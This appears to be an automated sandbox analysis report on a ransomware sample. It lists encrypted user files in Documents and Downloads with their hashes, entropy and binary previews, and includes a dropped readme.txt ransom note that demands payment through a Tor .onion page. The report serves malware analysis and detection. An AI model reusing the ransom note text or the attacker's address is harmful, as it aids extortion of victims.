                                                                                                Preview: 7.^...[=T.4hf.U.+....#.5l........z.'..qI;.........Y.........?."cL......;..W.."Df.d.\y.n.d.9.......).jG....Q.]....j...?.m...s.^...._.f..<...:/*B...S&s. _k.....P.....6X.4.%.F....%.h..p..}24..z...k .Q..M.....&....V..g.Z .[{..W3...".5..cl..%bxL.9?.........j....v....Y..&.g*.s./........J..........g.....%./.&.`..Z..q?p.....D0b.M...,8Pe..Q....[..X;.v...~.[..J3..7..zWdi:..D.>...~.|.w..d....s......Rc&1[...?.j".$..=g.'FSQp.w..j...Ly<..~%A.....E...n%..R...........kk...H....0....6.!.%..Fm<.\!x:..g!\"....k>.0Fe......E\G.F'P..%#M..)...acd..M.d.$......6..'...\.1.C..d.od..ETY...]Z....*y/!;,.5.$j........i..)]\.r..ss0:...9u.9j.zR.y.<.l.{?..4z..o..l.....O..\.A9V..%.S%c^(dW...c`.....4RY7c.%w..b.{#......1m.A.%z|...s.%."...u..({....Lt..%..V..I.8.....6....1J..e0....."n.t...X#..h.....n_....5.o...l.....n..>l...Uu.-e. ...!.....5VN..O.7...m...J..........2F.n.....Z.O...|..{.|..Lu.h7..."*.(@E)6..oR...........Wgo.......y=f...U..........p.F'^.h...Tr2o...#..bfK...Vp
                                                                                                C:\Users\user\Documents\QNCYCDFIJJ.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.849175667279364
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:T2le+IZJi0KA4X0BNYuFo1YRU8eO8mdHeN0zcPAUvKxqvrLuVl26FTwYGsknX2s:TK3JU4k7vm1Md+NVPA6Ks2NwYGsM2s
                                                                                                MD5:79F7AB5E3B55478AD50A6CEE7EE53BD3
                                                                                                SHA1:7832CBA76CBA7740237D08E42972B754A026077E
                                                                                                SHA-256:4D3B2DE9431A17ADDF40875BD10F50B994975ECB795DE521319C1CEF42D35FCB
                                                                                                SHA-512:1B26C9882B96C2C52AA4BD6FE0E8AA80FFAA81222124B6C82555B72859368B0A1C692255567CD7A40BC8949CD9508722BDBB347A4DB7BAB4D6E8149414F2EB02
                                                                                                Malicious:false
                                                                                                Preview: }*..#..3...5zDCD:..b'.;..<+6...U.b.I..x...kd..\...MhW.<@eM..h.1.W..2..U..0u......d...VA....\%.\....G|.....*.z..o.TL.w"mhG.F_....]"..../.#.f.<9.1W../..a....)g.@....!..2#n.c..w..A..h....!.'...`eY..(&2.U..'..SM..E=E.....i1..\.L..Ql.M ......E.G..!...E.O...V=*....|.....?.......XOZ..3..3=.oVD4........v..\...@..t..t}.n.3..q..i.R/F.Vb.#_...]..90....k......[5*9.=.lX`|.)@q+I#....=....^?...?p.7..S...G.\.......m_....b...%..z.(.6...x..B.BZ..?. .i....`.....n..h.'7". Ge.....eK\..^eb..j7..T ..2V).&v.c.0:O....;j[.Ua.dK.&G.}&.59....4.X.{M.$.+.d....1"...v|......;.}z.......G...UH.....|l...!.tc....w..J....kLY...a......A.G.yWaS!....U.6.w.._..L.J.Z._.:.....k...Z...o.....o.Zk,Am...{.'o...@C,_nS....g.......LiP....?G...0.i7.......Ic}M{....=.3.....d.K24-..gE......7.~.....R*....i..<@..,....p.\.@...z.hpw...Z...87..0.-b........~R....Y$#.7 P.qM@...XI.!bb..".....f0.3.<.a........E<b.E;/..Y4S......K...I..!.E. .0p..C..E.M....Gx.=6.=..N..C..g.Z...B......|.R_......@..a....T>.Hm.....$|.
                                                                                                C:\Users\user\Documents\QNCYCDFIJJ.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.846776469421319
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Ids9zpab06Fy8z7VCmieywCwsJfE4PetvpAcFBvwDo5Cm5g:d9zmFyPDeywzEfXPetvdFBID0g
                                                                                                MD5:3862C81A76CA758590CF929162355AED
                                                                                                SHA1:6CCC1D612B22431F1E86A81F96C201B7CF24E955
                                                                                                SHA-256:0AFB3ED58DE632E7072ACB639258B06A3204C03E9B458F50AFF383983DC68EDB
                                                                                                SHA-512:A6992BC0D6E5821ABEB6955CBF70D224A5CECE206186D144DBC915A56B8215FDE0A4B6D72264F1EA59E36DF4A35DD9CE421445DBA66D1CE30203CAB839AF7036
                                                                                                Malicious:false
                                                                                                Preview: ..lL..$8.V.....-.,.6{..........~..3.]..*.?.DJ.CL#.O.......d...........{$nI.c$...#.m.n.7(..U....v..-6..@.Cy_.p.F..m..)3......2......E..H..E..A..x...`N7<....4NV-T...\P...c....B...o....X.>..C.c.\K^....lP.0G.o4........z..-c.JASv=?....\"..].2.^B.q..x_.L.EA..\.._...L".x....K...`:}....Sr..g.QQ.UO...dr...:>t.0..f6.q|.aT.@....w.R.4D...3!.QX.X.z..}.;S.95"{.....;l...0.b.A...D2.Q.(f.Qi*.....\4./...b~.....^.F...]....#Y....m.m../.sS...i....@...t.Xg-....b.../`#y.......<..)..S....S...3IN=.z-J....~2....P.Cp..j....7...df}f..f.:..{a......4...X.X,.....7...9^.,..V.U....}...lv...V.......V....?"v.y.L.!]i.GX.....Y...})G-osV.6J.r".0..%Q......".....['".....'.;V..:>B.=2.`._.#.6Q.p?..N.Ruj/..=..nN........6y@.E..E...ku..|.-..;=...v.....F........]....M...'.....,.Y....vq...8.L.(F(....b.HO..O...Sl..L..U..X......k~.^WJ.(Y...P........w_......]....r.L'...*\...|*. Zm....a.....:...W[...F.r.oB...r2...O$.......}.`Q...."..s..U/P.......mkm..ua.F....$.5J.T?zz..@.*....@..5.O
                                                                                                C:\Users\user\Documents\SQSJKEBWDT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.849411656238164
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QSkw0K6lWs6a7I+5kliZWmvSKfVb5FG0bT0yVK1vla+iY6Rw2KoWFTS:QmGWs6zlHmvSKfVpQllKYtpS
                                                                                                MD5:ADDD6FA11B59BB8E93E3D8CB833EA5B5
                                                                                                SHA1:44412180DC7946F4CF4717E3F33CB6DFC9613C61
                                                                                                SHA-256:8042FE6FC493EABE1BF10FB58317B5CB6AD59AFDA24D7364E1EF163A2BA07F95
                                                                                                SHA-512:9E699A4FAE6AD5F132CEBB448B6B4FCE10037340DE23BAAB22C16ADAE4CF20E79E742C9434C39F18332B8B7B1630332C0E951A910BC66B00F43226C084E794DF
                                                                                                Malicious:false
                                                                                                Preview: .K.x...^............s..c..#....*B..a..9...+.MY...(.1.VWs.S..5.-..P.....6Ww._.tg..p....".A.....S'..^K...]...3...*,v.pE.q....r0.87D#.?.F>.d.....m....W......L.=..)t..*1.).....NL.`....~.Q.#..E...>A:..A..gK.1._.F...V.....F.v<n.#.E9.{W....Dj.2p..?........>=.Tv1?....j`..*.vE...^...-9...8[a.... ..0...SM..\_...b..|...y\[(F..X..N..2aF..M%.b.\S..@E.....{X..s.{..e...]..}..,e.....G@{.....W...'.:pK...G..?77.|.m.....ZN.@%.K.....cN.1>...A..zx.q..(aIC....u.........|....u.du.-..g....)Ab.{J....k...F.fg..vB...(...0?.)3R...tz....b>g..wU...' ....RW*.I%jY.,)..(...H>...b.....$(..a.KZ<M...&zo.a~.).8.Gh.I@...^.. 2Q)...<A[mvhG.x.cF..@d..V..$Kp.u.,..Q7...K+.s......K5....1......i..k.-..&.D.5^.s........"..gL_..\.....G5np...s;.6....4|~.q..D6B].d....@.9....O.....6.}..U.*.~.k9.....G.. P.gA{F._<..e...%t...(..mv....o:yo...%...}F"..).x..KI...9.@(.o..b3^...."y..!74...4...".c.&.-.+.9.C....[d.%..OO....g..A#....m...2....$.@%8l.YA.bz..6V..o%.j..O....J.j6N....f....Z^t..
                                                                                                C:\Users\user\Documents\SUAVTZKNFL.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.848487881347847
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:dKbpT6UMC8oTvcO/1h31pr0/GynDiSgyO4Nourgr65GoEUj:mH8o/nFprkTeyOurgr65zj
                                                                                                MD5:9A404FDFF486005288223CF665F124B7
                                                                                                SHA1:28F9183B410B35F9EE6ECE649D62DBBA45587E4B
                                                                                                SHA-256:8974F1295133975EB8FFA4A9DA9742A695E8A55D0FDC147308885FC45F36BE0B
                                                                                                SHA-512:F4660D0F769EFB4AA7620FC73D4123B6BE5C505B94DBB9C1C013C4849AF1FB6F375B302BA7090D2BBD20C80A53F1F18187DDCA4B37DEA31693FA28300054DD2F
                                                                                                Malicious:false
                                                                                                Preview: U-..K..I....$i\.0N.3.ql..&.'xQ.g.V^.(....8..R...BI.X..T...<z#0..8....p..hl.eH..lj%..,.)....?r...$..#{#..n...........>.....z....*.+i.t.....dhmh.(eo.......f.../.N.....t.<.u........C.)4.....7Xd.+`..SF0.....>....dc.7...T...2.z .".X.Q3......x.$D.G.+Jk(..U`E...9-t\.....[Tn..x....fB..2.*.......j....D.p....*0.....w.1......R.f...r.d..b.s.G9c.z....q.x".....Q..d..j0..3..h..n.^.......-O.rW..t4.....vqd(.@[Xf=I.UY.e...N...K..hz&f]..<.......k..)O^.>i.'".A/.''S..E.,#O..E...."....h...E+}T..@..5.z...q....pH..._/...j.w.u..m...."C........*].....i...........a..%....8......{...G.....'.0..dB..k.gn..0.VK.h.6.....Z....Pg:.G.. ..1T^..n.........<......I.T..].eP[.o2O.N...".<......%....D.#,.^.......@]H....p..J*...I5..")a].v.....D.kc....byX.&..-...UG.-?..~..}..._...`..(X.}>B;............|..I....;u.(.p..`..AL......A.3...A S....I@.......=p..". h...?-i@.;.....lQU..6...g......4.....ka.O....K.....a..s..C...LS`..@.oI=/....J~C......A..:...*.........E.'.w^.!..]Dl..`...$
                                                                                                C:\Users\user\Documents\SUAVTZKNFL.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.871023076197927
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:I65aMIWanUrTXrqip19A/iXONf0G32OhuJNCPWxBSzLWFnmh4glS9eqIbLibo9Vu:wMf/TXhOlWKihmygw97IbEovsH9
                                                                                                MD5:086CC43354BB99AFE98902452D2AAEE5
                                                                                                SHA1:A408C6156E7259249886466FB38B39A6DB1981E4
                                                                                                SHA-256:CFDA11779C3047AB9D9D365B87D5DF676FCC4A1E154969242AD58270B7403E32
                                                                                                SHA-512:C3933C92721A86272CBACAC0EA20BAB36EB3BFAB0050442CA1381F9F54C3EAA396F82FBC3FA9B93EA9C181FD5FB9DA5A45E61DB420DB31F4E2F6B6BDFE99FAAA
                                                                                                Malicious:false
                                                                                                Preview: .i.......Z.Q..~..&.n]`..M.7!..=V2\.r.Vx._..Y .....Y....u.........6.........}W.w`%=X..c.*.@.Fx\N.Xv.....5"...$..`.3{.s.......C.....Xz.Lu.2..^.C.a..a..U./.l^.g.J...:.k....ob.b.5"W.7.X|..O.Y.Y......c.....g.....$...,..y-.a....WP^.........]..?....r...X./.....N.f..q.i.d<....s0j..L`..|...z.u..|k..`5..R.6 !..p.J,..(.........._..x.%..Y....../s.......RU..`(...M...=.{}.O./...y@.........l.C.3..n..\.Q..&B!....U..}<`..U-GS......>z.k.|.!..71ZNqpW....E.W...M.`1....j5......"P...jD.E%s.Y...;....U...; RI..x(W.kE..I....)..=...$...u..M..3....;._mP..j....m..Xsb/......}..%".0.{.@\.t...C;.*~k.}I.l....-9.K..Rm.B....xz...o...`..)-W..S...~M....5.M....A...(.%..P........*e........p.RQR.........H.v;l].zn.b.6F+.c;U.3.w..]...f.=...........t.. *...z`CK...X.V....[C...[..oF~/....e.Z.d._.eE..q.H..(..P.t.f.!..z.E...w:....=S.q.....].t..o...{.6o.3.K.....P....JQX.7...g0.VbJ.h.B.rE+]@g.N.....AR.n<.!3..6..H.\............. ..Z.M?..,:PU.N.9...dQ........T..../..D....g...B
                                                                                                C:\Users\user\Documents\ZGGKNSUKOP.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.837098324502265
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wSuSq2doCBs7sRl9xuMfOZoUP47mh6yLetoZqvrqpw2aHO:Nq2d3Bm8NfOGUQezLprwPHO
                                                                                                MD5:1E3698229F49DCDE5257F94335CA0329
                                                                                                SHA1:BB16295E5E30194ED3513EBF37C5A48194018E4B
                                                                                                SHA-256:D05B7B4B7D79E4666AEF251C2C5CA469931E9B28F9766DED9A44B518130FAB00
                                                                                                SHA-512:4ADDA85323B1B836564D208E7886DC47A360FEC4112A0EB036AEB8BA1096D8338CB2E9EE07A28A51D4F918F322BCCAA66C78BBB1AF9CEA612AA7E9EC8E4DA811
                                                                                                Malicious:false
                                                                                                Preview: yjo......T..b.IT..Sl.J...|.C..%~..../8 =.I1...P.....G./:.P..g.F4.kS.....JM8..v..T.....F.y6..}RT3..:...+...w.oK.VP..x .>....K..}h.eF..?.).].BKnD..;S.Y.u.Q....M..@.L.$..;.b....m.......F.V.f.K.p....F...G.t...u5g1...NY.@...x........f;.../.H..S..P|..`.........y..$..j...w.fL...B..jT..".A.....!?.i.y.g...$L.T8.2.......w....%..Y.G..R...hP...>j..Yk...b!.Ki..B.....z..o.....q.....#!...S...l......Y2.....d....I.^v.{~..,|Y.5._./...;....BD:,....Z.)&.G..4T.{..e..*...;.......4.M..,.w...!.w..-.K..j...G.W.....q..'*N.<ed*....&.8s..... .........R.@q..V......o\..c.H..S+....w............9+.....*.ez..i...1*N.V.iK)w.#T....b......e0..;|,q...0OX.#.H.jg.h.y..c....=ML.0.t...~..%.-..s.T...b=Q..5...P....O........G.<^~..b.Q.#..pF.n.../A..N.|.y1G...U..wGL.....p .*...\..Nl/.&u]...)~4.".o.*.c.I.<.....w...)....L.._G....=._."{>F...z5l...dE..z$.s...:.#........?..q..%.f.....Y.u.uu....?..I...9.._.......=.%..._ .o...t0...)......)...L..r........w.4....c...o.t.8.w..,.B..eK....q4
                                                                                                C:\Users\user\Documents\ZQIXMVQGAH.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.86989470255484
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:82ZjgUQWjkC0D6+q4iHHRn+A8vVSuYers1dGBmBpe/RjN:tFgUTLDHEAVYrYNpe
                                                                                                MD5:084570512ADCA98CA2A8785B4550B049
                                                                                                SHA1:1475CECD9AA085F229081ABBD54CD9F40F37FB13
                                                                                                SHA-256:BF707092239C420969C884945D68853D4A344DDB3F257901F1F99285008A29E7
                                                                                                SHA-512:F3DE78E8B871B85C171C78E4D45A2F7F10CFE76126E2580BE0986910EC1AC3C164ECAB3929F0AA71A09C987A512F32839E4BECBB2E82C5A56049A7A140C3BFA2
                                                                                                Malicious:false
                                                                                                Preview: .n.Ui.F0dI.....78.o.7....ur.G&..(..Ps...<..UT.m@..;.0e.#4.RM....zS%.9.....N.m.........Bb...].Q..JE`]..|...H9..U<.R9.../aZB,......f|.(p..<;=..u..$.........(../%_....~.A.wN.\..*.......q... ..).h&.:.....~.AP]j.`..SG. bD.G......l"t...D5.eq.:.......+.".L.kN..~.q$..%h..C..$..f.%%...te.n.....ua.[.1^c..6...S.A!M.rP.$.[.W..s*.v%...r...w..rV.?H.n. .~.W.Na..E/.WG..V+....K.m.$).9.|.*g...O..?.H{.`....ci.e*..";.o.......U|Iv.R...<#..oP.J..)^....d...-n..Q.:Z\k4/H.....f@.ns......]..'..,......<.....[..g.D.'B.|.j.4M.}..v.b.......s.a...s.F.sth.|.dG...3{.'G.sz..M........O0..T.|..+e.[..TQ.]...%S.o..B9.\.z.]..wT....T...Mv...a|R..W....0...O.N'~.#..C.....0..|...+...)..(.<.7...PA.......oEL.1.............u..>.C..[.......,P.D..._..N...W.<).3-..,..N..!...4..D."m..z...m'..M.\..`........5vb....@...s..uw.s.4.R..._p..a.&f..k(..;..z.A1AXEg..?o....<..X.J9..o......;Xn....a..._.....amW.r.R.{V..).y...K......a..R.@|...x... .8H.p>.a{'W...F(...?%.K.q.N....hI....bS.
                                                                                                C:\Users\user\Documents\ZQIXMVQGAH.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.880048805523424
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uDQ4e3nEdkX5rESzoZnBGV6EJJIywvG4T1GgVikD43YGTCgBpBQfzJKx45Tiz:uDpeXEdkpAS+nwVNIBhUJYyCgafzJ40g
                                                                                                MD5:DD6767708926FFF65C968DFFFA38932B
                                                                                                SHA1:D3E8D38EA838539CA0BEEC7B2537FD317AEAB469
                                                                                                SHA-256:2F4F674570EAC51A9F87FD4B512142F6F3BDF7D2CDBD234A82F998CE43B61EE1
                                                                                                SHA-512:9E8470EE58F18103ADCC5BA10A70617BE78F0DEBFC09412894B2212FB1161F6903E198EB9A8D718E558412FF7D6DAC007743F54CA2C1F450D60E9EA9E0A04EF3
                                                                                                Malicious:false
                                                                                                Preview: ..L..J...=s..z.!..9......o.+K..DWp[.k...I5.x....;.c.....rU ..'W..1.}.D..WTO....5k..P,6]Bw..d.1....hl`0....q].yP..)...>..0..2eN:..D...2pP...D..a........w|_.+%........d9.D).8U..)w...*tS.....;.w.H.".f..n..f..J....;U.t...3...!8....5..[H...e..Ug....4.m/..u...K...%{.(..@T.u.=..7..u...x.u^......<._.h....<&K.E-5.t....+..6.....V_./..~V...@?.M..}.g@.l....iz.@0..-...3{..".d...1...:.A.....={[...G..d.f.>....?...z)Aob.^^"...E......_.@.#b..eS...X..!..%...*................w.m...g..O....Tnp../`;.\.}.c.>J,u..Et.E...=?.."......[6..#..x......$,.y.g...X.[........M...J.........r..{j..i+.+...V(.~..L(.....5..%.>X..u.#2h.h..$&;/.C..5X7...*I..r...#.......t...^...%.[.q'.(...7fU.3...?`...i....d\....-<..!...~3\...>Q"....B.Y<...|..W..Y..a T...ki........P....c..G.[....}k......s. ..s..W.......D<6!..`.+J.....5.%...)..An.o...k.kX.|..P.C...6|c(..p....g$.&..Zmi..c.^n........@...J.|......uK...n.C...*..=...l..z../..,%..g.A....A...b.C.;1k.q...j...R...E..d..9..... .uo.......*
                                                                                                C:\Users\user\Documents\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Downloads\BJZFPPWAPT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.881997945811074
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0lTytCBBAmSSdOug4T7pOVwJJRqOH7t0cfSq3tz3GRwliFfkosITb:6T+CBBhnguTHRqObt3fVGBFfpTb
                                                                                                MD5:D7A265F9E143323816398DC1C3EEBEA8
                                                                                                SHA1:0C070CEFA695080AFC441927DAA4AC124A9FF38A
                                                                                                SHA-256:C9C6FB04013FBC15A77D3CEB0F280F08678A9AD5D075C546B420E9281DD4C225
                                                                                                SHA-512:3DC986552780FDBFE03AB30992B2C40B4FDC4727BA0C8A9AA84458F29D6CD3B3E257A67AEF9CBC66D0578E98EC56D056A1F60CF352E1692F03D1B0E84EBA4DE4
                                                                                                Malicious:false
                                                                                                Preview: ...h.....z..5EN.b,.Y....i.S.U.`o..[H(wB|...` .5...q.......7..[t..;.......WT|.^.~^d.{.c...=.........K.i.l.;.<../}..~....W..yL....n...4.J...%...+q'...j.^.t.................T&.J>.2XO=C......9..!.9.Q..L.Wwx..S...6.Z..D..*wz.sK..E...y...y.....g...-..5t...1.......k...+..5.X.....r...e.{_....0..1.;....L.P...]......B.l...+/&.p.....sZ~.Z.m(...PaI.UH.B3`..]......] !?. ..h...w*.t......%A...~..@..e.U...~W[.....^&c.'..:u..)..} c....V.Rad...Z........}...QA8.f.A6..[..3..%..P.._.1.C..C.T.W.|..@.8o....h.......w...N.E..Wp..J]7.cL8.'....>f.U.[]..Az.`....0.@*.F.R%g..1.tV...u.1.9..@D.w<..M?.2.C.~B....x.m....8t.|).5.@oFGJ.q.d.R...Ze^at....".*4.....H....)..)(]U.....W.;E.iY...a.hJ.^...8..{.9...+.dl..z=..$.....d.......;.0.F^...e....+..9I.t2.2.J..s~...I.B.|.fjl.^.....qc....V.Z(.....$Vt...>r....\u.l.^...<.gx.)......&..d..g}_...K.%s{.O.Y4}.....l/.I.'.....Un...L.\..R...-..i...z.qH.S...b..Hd.W"9....$G...j2R.u.I....S3...+.J...G.Y.|?1..*)...+.6l&.*.'..8.1.7Q-}.h....?
                                                                                                C:\Users\user\Downloads\EEGWXUHVUG.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.85109205906326
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:CG15P3fsXjOh0awxTIfNCOhHGYRUwueYQhc6KBrfEZpH3k1jRdqCSXZdU3gF:CyvfajyTwx5ojEeycXkLdq4w
                                                                                                MD5:03AEC6E44C20BC1FE9360937B0833003
                                                                                                SHA1:2098BD486032926793E6A148E7258A949DAF179C
                                                                                                SHA-256:0ED38DBA83F41AB7E011F18B9FC413092E8ABB947B381FC262E1CE7D9F3BD1B5
                                                                                                SHA-512:A24C4E39E20E8AD0B8E86EEBBBD568C8170E0EB3CA6D123437F6EFCA2C8CF00A87CD3FB00B822DE808ECC016C9203A02597675335360861D16E63FB9F6B8A819
                                                                                                Malicious:false
                                                                                                Preview: N...6....C....#...E.x.g..`..O..<.z+)..1t.hj............Z.,w..j...$..y...5.J.&5pr".e.y...H.....vE..Mw.z..%:.u...}...."S...B<.$.~Z.0._2.....&.[....VD.i.X.........k.e.7>..*QK.....e.......!.~?...%CWt7.....bg .^.[#.l.K..u..q....S+.....52..[.@f4.L.>.F'.-6;...|..H)14Bi..;../.?N.n..?.{L)^.CK.q..w....Q(:H....b...S...G..,#[...tq...?.7.y......c..X...oH..Tj..Q....+.7~x.....!v4..q.(.4!.(.F{..!'Y...&\;.zro..9b..u...6E.]).N..Z..n....d?....E..e.%.q...k.k.I..g<W@/.B.".'..,c.....M.7..}NC.....O.;..1......|d.q9...>.............J]..nY..=..Ni...XV:3..k..i..Uy...d...r.rV..'..Zp..*"..XI....H*...U...F.o. ...+B8z.h3.}...K..'*..O...a...U..!...v^..........._.M-...w;^<...*..q..p.}..S....c...9 /@x8....K.C..s.Fw....].R.x...T....1U..c..*!.eICV.SI...o.n..$r.h..E..x.}.B^..w...I~b...X@..'*Tu0S...XmZ.z...&..jU.s|.........g!..I.....Q...V&...z *....e..?..!.ZPJ..rX......5I"(..X`>;.!...BGMr....s.=.....r..P.B...5.c.....8..@./.I........MxCp.-c:.l[._...I@.,.5I..q.[..\'.;
                                                                                                C:\Users\user\Downloads\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.847928466568488
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cdVxcHUU71+xIep2IiuIKbChZLLw2zK42xAWF6AVXVrZVRYpxxArnv:w5UdgCh5xz8AWrxt5Qx27
                                                                                                MD5:034BE722B10F11D85A79C8BC4F22FA2D
                                                                                                SHA1:14D37B11F5D6C8A07A71D63E1130A1538990C8FB
                                                                                                SHA-256:40F316CD4ABC31394FEE283886CAA3491F695FF81A6FCEA8C6876F887FFFFD9C
                                                                                                SHA-512:4B46BA8A293D55E308F4BC6895C026285532350346F3437A64AA830ECDBFF363D83AB5DE4471D81A75390F6DC4535E1BECBD77366B2AE93ACF74BACD715D0363
                                                                                                Malicious:false
                                                                                                Preview: W.ny..t...MWE....{...H...P.Sb..vt..."...VX..Y8...h..~CJ.M....|......tM.W.._R.p.*.u.K.J10G7,#.H.Y.!..Y.U..f.Qh....W!......L."..Gd.XU=.I.......,.A.k.y............S$.[..L.Jv.uh.RQ.uod.e.;K...?...s.......D...".i.....`R...!.....V.}..y..FLZ.&.>..q@..%H..`FJA}_..g.F ..2._3.c.p8vb.].Qs......~..t .Ly..f..!W..%..U.......""..>.}..N......._.;..."..&4h"l.".+_....-m.i.:..C..\.....A&.]{.v)h.`i..B..%d.J...(.}...Fo]../+0..1..s...R...rg.M.....B..S.1.........s..Y.w..*...:{... ....O....>a..7c-..2.dQ?}..$,{...70%.>...3!.....y...Mns<...o.U...;..."..S@YT.#d..k.....v.........=..?.h.74.2..5..Unx!>0.7.....U....x.....^..w*5......b....."...[....@f..tS....rk.....Lm.v'.~$.pR9...&z...g..5.Gje}.C?....h....H.H..9F_0=._._E..K!.S<.r....o.....6(......i{..3...mE.b.El..8....6....u....s0a.$....1..b...0....Bf(F.Q&.<.1..[N$.n....?.T}.y....r....p...)....ye.......j....}+.*........T..x....F.Z.Q..@Jfm..=............L.......\...q.1+..L.k...N..w..*...1R.T..1.......o1...../D.Xo..5j
                                                                                                C:\Users\user\Downloads\GAOBCVIQIJ.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.864864485786807
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:1J9zChz3jPdf80JDvv4f6OV98DYHYFlMYvBnTVI2+dxJZO0LYsf+brbi8yP3+eG:1J9z0z3j18+Dvvit4FWYv3Ux3HYsfyCQ
                                                                                                MD5:72E510636496991955E7B0FA1E431D55
                                                                                                SHA1:D59F3460D412AF55AD4BBD29D276BC94BBCF2E50
                                                                                                SHA-256:B6609FB4381025E8FD36CE39D55FC97907991CD44001EDBA953E4F1977D584CB
                                                                                                SHA-512:358440A45AD9C77C65BB23EB7678DAFBA5A6BCFDAF02FEF40C0D39D96D74FE11A68FD4FD6A57381CFB9EDFCFB381764CAADF10C9DB7C7E2164BC0D74DD33E35E
                                                                                                Malicious:false
                                                                                                Preview: C.}..:...?.....9s.,.R..23K.....}}.u./?.3.]....ZI.<....1...d\,Q....&._.61H...L.:.....0[SW.>..1.3Z.eV_j...T(....`..DV.d.i{.g..6..f..5d......k,...0....O..9E.........C..jP....W..-.2..i&.3.^$8....o..`....D9.l6kw.....nZ..@..r.0...."qeu.FK&.....i3|. .M.L.<...%...\..>.'....%\d.2..S.(.J..Fc\..w.Y./.o..i..d,.q.......Tyr..KKH.....t1....Q..{.$..z.ByX.)S..x..H3?o..\r......&..WN........O....<.,.....N.z8.....&j).S.G.u.f.2D.$Q.R.........~...d... [.._L...;R.......L.'-...\.s.`........a..5.9.ta~.^....%bD..J..q`..z..h...?.[...@/.'T../D..p...v.mw....d.1....+.......+.<......x.3......I..pM...k-S.....4..4.uz..T.H.&1...^M.?..~.Tiy.9..Q....n............VD.....<.?...+.I~tEFcG...!fs.m+.q.2.).....G....!...q..._"..vdb[Xn....6.:.12B&.n ...s.....(<p..cEj...{.X_8.;s."k......V..?..~..Eu..Ya<.A.......`;....(.b......[....D.....f..;.....(.E..G..@...N..1.G..il_........[w.G.9....]E...U.....nD.d.Of.2S.B....}..;...$..$..a.c7z.....f......t.^HHC....b......D...I...D......V.m..
                                                                                                C:\Users\user\Downloads\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.864214790882372
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:l68AMYVkb8Pe33xoIDncisj3VTNRuUl8x4QxcrRc2TA8zyB9Gbgi/:l6fMI5m33xncNjVTHuU0yNAULb9
